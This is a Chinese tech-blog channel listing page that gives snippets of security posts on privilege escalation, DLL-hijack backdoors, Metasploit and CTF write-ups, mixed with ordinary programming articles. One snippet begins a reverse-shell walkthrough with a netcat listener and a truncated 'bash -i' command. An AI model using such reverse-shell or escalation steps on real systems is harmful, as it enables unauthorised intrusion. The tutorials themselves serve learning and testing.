安全渗透—Hacker 第18页

【微信小程序】带你进入小程序的世界

✅作者简介：大家好我是hacker707,大家可以叫我hacker，新星计划第三季python赛道Top1个人主页：hacker707的csdn博客系列专栏：微信小程序个人格言：但行好事，莫问前程初识微信小程序小程序简介

honker707·2022-09-28 06:43

网络安全从小白到专家

第一篇KALI的基础操作你的每一次点赞都是我更新的动力第一章网络安全渗透测试的基本概念1.1何为网络安全渗透测试网络安全的前景下图是16年-22年中国网络信息安全市场规模的分析及预测，可以看出网络安全产业经济每年都在高速增长

好二狗·2022-09-25 15:03

用python实现猜数字游戏

✅作者简介：大家好我是hacker707,大家可以叫我hacker个人主页：hacker707的csdn博客系列专栏：python推荐一款模拟面试、刷题神器点击跳转进入网站猜数字游戏实现思路完整代码结束语实现思路电脑随机生成

honker707·2022-09-24 03:35

干了5年初级程序员，我好像开窍了……

编写软件与建筑系统》的文章，在HackerNews上引发了许多程序员的关注与讨论。不少开发小白感叹：我该如何跨越成为高级程序员，需要做哪些努力？那么，这两者之间都有哪些区别呢？

CSDN 程序人生·2022-09-22 10:19

【MySQL基础篇】MySQL数据库安装教程

✅作者简介：大家好我是hacker707,大家可以叫我hacker，新星计划第三季python赛道Top1个人主页：hacker707的csdn博客系列专栏：MySQL从入门到精通个人格言：但行好事，莫问前程

honker707·2022-09-22 05:41

从[第五空间 2021]EasyCleanup认识php_session

进入题目:源代码15|filter($shell)|checkNums($shell))exit("hacker");eval($shell);}if(isset($_GET['file'])){if(

Aiwin-Lau·2022-09-20 08:46

【IT基础】那些年,我们迷恋的cmd命令（一）

不要把我当hacker看，我只是个计算机爱好者！怀念一下，大牛勿喷。那些年，我们迷恋的命令（一）那些年，我们迷恋的命令（二）CMD命令cmd①netuseipip

weixin_33806509·2022-09-05 16:04

反弹shell方法

准备:hacker:192.168.188.63(kali)目标:192.168.72.130(ubuntu)kali监听指定端口：nc-lvp1234反弹shell:ubuntu下方法一bash:bash-i

s0mor·2022-09-02 17:34

网络安全渗透测试超全工具包合集

网络安全渗透测试超全工具包合集大概200+常用的网络安全攻防测试黑客工具脚本资源来源网络，仅供学习交流使用，如有侵权请联系删除。废话少说直接上干货网络收集不保证全部功能好用。

小小技术袁同学·2022-09-02 17:47

超详细渗透测试流程

越来越多的网站以及app手机端客户注重安全渗透测试服务,上线前必须要对平台进行全面的预渗透测试找出安全漏洞以及BUG,很多客户找我们,做渗透测试服务的时候对具体的流程可能不太了解,下面我们把具体的渗透测试方法流程大体写的全面一点给大家呈现

内网漫游-网安人的梦·2022-09-02 17:58

Burpsuite工具的证书安装

Burpsuite工具的证书安装Bursuite作为一款可以用来挖掘各种各样的WEB安全漏洞工具，在web安全渗透方面经常会使用到，可以用Bursuite进行对数据的抓包，其不安装证书时只能抓取http

逗小花～～～·2022-09-02 17:57

外国程序员求助：快 40 了，不知道以后该怎么办

转自：HackerNews，编译：36氪-VivianWang链接：http://36kr.com/p/5133609.htmlHackerNews上的朋友大家好！

程序员编程指南·2022-08-31 07:28

C++ 数列游戏

个人简介大家好，我是2022年3月份新人榜排名第三的༺Blog༒Hacker༻支持我：点赞+收藏⭐️+留言格言：༺永做优质༒programmer༻系列专栏：CF&UVA个人主页：༺Blog༒Hacker

༺Blog༒Hacker༻（山子轩）·2022-08-30 12:30

SRC挖掘密码重置漏洞总结

零基础学黑客，搜索公众号：白帽子左一前言最近一直在看国外众测的文章，偶尔也逛逛hackerone,发现公布的漏洞中存有不少的逻辑漏洞,毕竟在hackerone上提交漏洞过审之后给的是美元，还是很有诱惑力的

zkzq·2022-08-27 09:03

视觉资料整理

：项目：自动驾驶：论文写作：代码：选机文章类：笔试面试：视觉资料整理工作要求，技术分享：深度学习CV算法工程师从入门到初级面试有多远，大概是25篇文章的距离https://blog.csdn.net/hacker_long

毅博明喆·2022-08-27 00:02

区块链合约安全系列（四）：如何认识及预防公链合约中的算术溢出攻击

id:BSN_2021公众号：BSN研习社作者：红枣科技张雪良背景：由于公链环境下所有的信息都是共享的，智能合约相当于是完全透明化，任何人都可以调用，外加一些利益的驱动，导致引发了很多hacker的攻击

·2022-08-26 18:53

前端网络安全

两个角度看web安全假如你是一个hacker——攻击XSS的一些特点-通常难以从UI,上感知(暗地执行脚本)-窃取用户信息(cookie/token)-绘制UI(例如弹窗),诱骗用户点击/填写表单StoredXSS

门卫老大爷·2022-08-26 10:22

Python 霸榜、C# 升温，揭晓 IEEE Spectrum 2021年度编程语言排行榜！

日前，IEEESpectrum在分析CareerBuilder、GitHub、Google、HackerNews、IEEE、Reddit、StackOverfl

苏小宓·2022-08-26 09:10

零基础学网络安全

《从零开始学KALI》第一篇KALI的基础操作第一章网络安全渗透测试的基本概念1.1何为网络安全渗透测试网络安全的前景作者：国信安教育链接：https://www.zhihu.com/question/

好二狗·2022-08-25 14:20

[Hacker News 周报] 浏览器中运行 Postgres；与 Python 兼容的静态类型语言；分布式文件系统

https://www.bilibili.com/vide...本期时间轴：00:10Numpad｜一个新式文本编辑器00:34Erg｜与Python兼容的静态类型语言00:57分布式文件系统JuiceFS01:22JiraCLI｜对Jira的命令行客户端01:33CrunchyData｜在浏览器中运行Postgres01:53JSON5作者的一篇博客本期项目链接：https://numpad.i

·2022-08-21 15:05

网安学习-应急响应2

必备知识点熟悉常见的web安全攻击技术熟悉相关日志启用以及存储查看等熟悉日志中记录数据分类和分析等准备工作收集目标服务器信息部署相关分析软件和平台等整理相关安全渗透测试工具指纹库针对异常表现第一时间整理

YAy17·2022-08-14 15:05

网络安全常用术语

1、黑客（hacker)对计算机技术非常擅长的人，窃取数据、破坏计算机系统2.白帽子白帽子的目的是发现企业的漏洞并且上报给企业，帮助其解决风险问题360补天、漏洞盒子、CNVD、CNNVD3.红帽黑客有正义感

你怎么睡得着的﹉·2022-08-14 15:02

[Hacker News 周报] 开源知识库软件能否替代 Notion；Copilot 开源替代品；逆向工程工具箱。

https://www.bilibili.com/vide...00:08开源知识库软件能否替代Notion00:35Copilot开源替代品00:52逆向工程工具箱01:08Emery｜效率工具01:24一篇介绍eBPF技术的文章01:50用DALL·E2生成logo图片的分享文章本期项目链接：https://github.com/toeverythi...https://github.com/

·2022-08-07 13:34

第六届”蓝帽杯“全国大学生网络安全技能大赛WriteUp

第六届”蓝帽杯“全国大学生网络安全技能大赛WriteUpWebEz_gadgetMiscdomainhackerdomainhacker2PwnEscapeShellcodeBank网站取证网站取证_1

EDI安全·2022-08-06 18:19

第六届“蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup

Miscdomainhacker公司安全部门，在流量设备中发现了疑似黑客入侵的痕迹，用户似乎获取了机器的hash，你能通过分析流量，找到机器的hash吗？

_潜心_·2022-08-06 18:48

学习笔记(01):Kali Linux 网络安全渗透测试-Nmap常用命令

立即学习:https://edu.csdn.net/course/play/24915/292894?utm_source=blogtoedu

weixin_42139497·2022-08-03 11:24

零基础如何学习Web安全渗透测试？推荐这份史上最详细的自学路线图！

第1阶段Web技术入门1.0学习导论此阶段，我们的学习目标是了解网络安全行业的法律法规/学习方法/求职目标，搭建属于自己的博客/论坛/网站（成为一名站长）、掌握Web技术架构、搞懂浏览器和网站之间的通信原理。戳此获取网络安全资源1.1技能清单Web安全导论法律法规行业趋势安全标准学习指南Web网站实战Web建站指南（WordPress在线建站）XMAPP原理与实践（Web集成环境解读）XAMPP安

大明湖畔的九青·2022-07-27 11:06

一篇文章带你学习Python3的高级特性(1)

目录1.切片2.迭代3.列表生成式总结1.切片#切片：取list或tuple的部分元素nameList=["Willard","ChenJD","ChenBao","ChenXiaoBao","hackerLuo

·2022-07-25 13:16

[Hacker News 周报] google 新编程语言 carbon；低代码工具开发框架榫卯；DALL.E beta 测试

https://www.bilibili.com/vide...00:11Google发布新编程语言Carbon00:58榫卯｜Sunmao｜低代码工具开发框架01:40Comcast｜模拟弱网环境的工具02:36Tweakpane｜一个调节参数的JS库02:58AI系统DALL·E开放Beta测试03:21一篇关于Scratch潜能的文章本期项目链接：https://github.com/car

·2022-07-24 11:02

华为云从入门到实战 | AI云开发ModelArts入门与WAF应用与部署

以找云宝为物体检测项目为例，介绍ModelArts模型的训练过程、安全渗透测试环境DVWA的部署过程，为WAF的部署应用提供测试平台。

TiAmo zhang·2022-07-22 07:32

Python3网络安全渗透测试教程

Python3网络安全渗透测试教程在本课程中，您将从头开始使用Python3构建攻击性工具。您将学习如何在VMWareWorkstation、KaliLinux和VSCode中设置您的编码环境。

IT教程精选·2022-07-21 11:10

白帽子讲Web安全（第 1 章我的安全世界观）

1.1Web安全简史研究计算机系统和网络的人，被称为“Hacker”，他们对计算机系统有着深入的理解，因此往往能够发现其中的问题。“Hacker”在中国按照音译，被称为“黑客”。

sports-boy·2022-07-19 10:07

《白帽子讲web安全》第1章我的安全世界观

一、基础知识“Hacker“：黑客“exploit”：黑客们使用的漏洞利用代码“Scriptkids”：脚本小子，只懂得编译别人的代码，自己没有动手能力ACL：访问控制列表XSS：跨站脚本攻击安全问题的本质是信任问题

询昵·2022-07-19 10:06

独立产品灵感周刊 DecoHack #022 - 截图应用如何在一个月收入 8000 美元

另外之前有发过Indiehackers上也可以看收入从高到低的产品。另外Microns.io是一个买卖微型创业项目的市场。在上面可以看到一些有在

·2022-07-18 12:39

[Hacker News 周报] Vite 3.0 发布；Bun 性能实测；性能更强的 Prometheus 替代方案

https://www.bilibili.com/vide...00:12Vite发布3.0版本00:30VictoriaMetrics｜Prometheus的开源替代品01:02对Bun和Node.js对比实测01:49Cleanupphotos｜修图工具02:14Vim在线交互式学习平台02:36推荐《PostgreSQL14Internals》一书本期项目链接：https://vitejs.

·2022-07-17 12:54

区块链合约安全系列（三）：如何认识及预防公链合约中的自毁攻击

id:BSN_2021公众号：BSN研习社作者：红枣科技张雪良背景：由于公链环境下所有的信息都是共享的，智能合约相当于是完全透明化，任何人都可以调用，外加一些利益的驱动，导致引发了很多hacker的攻击

·2022-07-15 17:14

世界十大著名黑客居然还有苹果创始人！

黑客一词来源于英文hacker，原指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员，早期在美国的电脑界是带有褒义的。

weixin_33769125·2022-07-15 10:35

[ CTF ]天机战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛（初赛）

一、【MISC】domainhacker题目附件1、导出http发现一个压缩包，打开以后发现是有密码的，尝试在流量中分析寻找密码2、观察流量发现有1.php，与1.rar相似，盲猜可能与该流量相关分析流量的过程中发现有与

ZXW_NUDT·2022-07-12 22:25

实用 | 如何利用 Burp Suite 进行密码爆破

本篇文章我们继续聊聊BP工具中一个实用的功能模块「Intruder」使用BP工具的Intruder模块高度可配置，可以对目标网站进行密码爆破，一般被用于网站的安全渗透测试场景它的工作原理是，在原始网络数据包中

wx17343624830·2022-07-12 16:51

110.网络安全渗透测试—[权限提升篇8]—[Windows SqlServer xp_cmdshell存储过程提权]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！文章目录一、WindowsSqlserverxp_cmdshell存储过程提权1、XP_CMDSHELL提权背景：2、XP_CMDSHELL相关概念：3、XP_CMDSHELL提权实战：（1）实验环境：（3）靶机链接：（3）实验过程：一、WindowsSqlserverxp_cmdshell存储过程提权1、XP_CMDSH

qwsn·2022-07-10 16:53

[Hacker News 周报] 高性能 JS 运行时 Bun；Electron 轻量级替代品；自动探测 Web 应用内存泄漏

https://www.bilibili.com/vide...00:09Bun｜高性能JS运行时00:40TAURI｜Electron轻量级替代品01:02Felt｜在线地图编辑网站01:19PocketBase｜开源实时后端方案01:44fuite｜自动探测Web应用内存泄漏02:05一篇关于rsync工作原理的文章本期项目链接：https://bun.sh/https://tauri.app

·2022-07-10 10:17

117.网络安全渗透测试—[权限提升篇15]—[Ubuntu15.04 Metasploit提权]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！文章目录一、LinuxMetasploit提权1、Metasploit简介：2、LinuxMetasploit提权：（1）kali生成攻击载荷：（2）攻击端监听：（3）通过shellx.php反弹Shell：3、Metasploit提权模块：（1）内核提权：overlayfs_priv_esc（2）进一步搜索提权模块：发现

qwsn·2022-07-09 17:03

[Hacker News 周报] 性能持续分析工具；数据库必须知道的那些事；Spark 与 K8s 集成新动向

https://www.bilibili.com/vide...00:10Pyroscope｜性能持续分析工具00:35daisyUI｜前端组件库00:55《数据库必须知道的那些事》01:21《浏览器是如何工作的》01:49Spark与K8s集成新动向02:15Raindrop｜书签管理小工具本期项目链接：https://pyroscope.io/https://daisyui.com/https

·2022-07-09 16:14

114.网络安全渗透测试—[权限提升篇12]—[Windows 2003 ZendDLL劫持提权&msf本地提权&msf持久后门]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！文章目录一、Zend.dll提权1、Zend简介：2、ZendExtensionManager.dll提权原理：3、ZendExtensionManager.dll提权限制：4、ZendExtensionManager.dll提权工具：5、ZendExtensionManager.dll提权背景：6、nc正向或反向获取sh

qwsn·2022-07-09 09:47

112.网络安全渗透测试—[权限提升篇10]—[Windows 2003 LPK.DDL劫持提权&msf本地提权]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！文章目录一、LPK.DDL劫持提权1、sethc.exe是什么：2、lpk.dll出现的背景：3、Windows查找dll文件的目录顺序：4、lpk.dll劫持是什么：5、T00lsLpkSethc生成dll后门：6、MSF生成dll反弹sehll马：7、提权过程：（1）实验环境：（2）靶机链接：（3）实验过程：前提-33

qwsn·2022-07-08 07:08

python基础练习（学python的多多少少听说过）

上图可以看出我python基础知识非常差，不及hacker707等python强者。所以基础比较差的同学，我给你们推荐一个刷题网站，现

knighthood2001·2022-07-07 17:11

网络安全渗透

Sqlmap简介sqlmap是一种开源的渗透测试工具，可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。支持的数据库：MySQL，Oracle,PostgreSQL,SQLServer,MicrosoftAccess,IBMDB2,SQLite,Firebird,Sybasean

小鬼别闹了！·2022-07-07 10:30

111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！文章目录一、Windows内核溢出提权[2008]1、内核溢出提权背景：2、CVE-2014-4113-Exploit3、内核溢出提权过程：（1）实验环境：（2）靶机链接：（3）实验过程：附：常见可读写目录一、Windows内核溢出提权[2008]1、内核溢出提权背景：在winserver2008R2中，服务器默认是支持a

qwsn·2022-07-07 10:54

常用问题排查工具和分析神器，值得收藏

1进程分析工具1.1ProcessHacker功能：ProcessHacker是一款不错的进程分析工具，可查看所有进程信息，包括进程加载的dll、进程打开的文件、进程读写的注册表……，也可以将特

特立独行的猫a·2022-07-06 11:44

108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！文章目录一、WindowsIIS6.0溢出提权1、Windos提权简介：2、程序权限的对比：3、漏洞利用过程：（1）实验环境：（2）靶机链接：（3）实验过程：附1：部分系统漏洞对应补丁号附2：aspx权限高于asp的示例一、WindowsIIS6.0溢出提权1、Windos提权简介：window服务器常用的是win2003

qwsn·2022-07-05 09:14

推荐频道

安全渗透—Hacker